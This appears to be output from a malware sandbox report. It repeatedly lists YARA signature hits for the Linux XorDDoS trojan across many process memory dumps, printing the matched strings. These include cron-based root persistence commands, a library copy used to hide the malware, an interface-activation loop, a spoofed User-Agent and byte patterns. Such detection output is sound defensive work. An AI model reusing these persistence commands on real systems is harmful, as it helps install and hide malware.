5435.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5582.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5582.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5582.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5582.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5737.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5737.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5737.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5737.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5551.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5551.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5551.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5551.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5436.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5436.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5436.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5436.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5696.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5696.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5696.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5696.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5625.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5625.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5625.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5625.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5646.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5646.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5646.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5646.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5641.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5641.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5641.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5641.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5455.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5455.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5455.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5455.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5711.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5711.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5711.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5711.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5478.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5478.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5478.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5478.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5708.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5708.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5708.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5708.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5475.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5475.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5475.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5475.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5433.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5433.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5433.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5433.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5748.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5748.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5748.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5748.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5719.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5719.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5719.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5719.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5594.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5594.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5594.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5594.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5453.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5453.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5453.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5453.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5699.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5699.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5699.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5699.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5753.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5753.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5753.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5753.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5565.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5565.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5565.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5565.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Process Memory Space: eTASxT3bjO.elf PID: 5433	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5433	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd33:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xdf4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5435	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5435	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1082:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1143:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5436	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5436	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1529:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x15ea:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5437	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5437	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5450	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
